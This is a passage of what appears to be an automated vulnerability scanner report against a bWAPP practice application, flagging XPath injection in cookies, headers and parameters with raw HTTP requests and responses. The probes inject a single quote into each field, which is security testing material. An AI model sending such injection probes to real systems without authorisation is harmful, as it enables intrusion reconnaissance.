X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.35. http://192.168.52.147/bWAPP/ba_insecure_login.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.36. http://192.168.52.147/bWAPP/ba_insecure_login.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:30 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13469

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.37. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.38. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.39. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:02 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.40. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:15 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.41. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.42. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:41 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.43. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.44. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [movie_genre cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:23 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.45. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.46. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.47. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:07 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.48. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.49. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13469

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.50. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:57 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.51. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:45 GMT
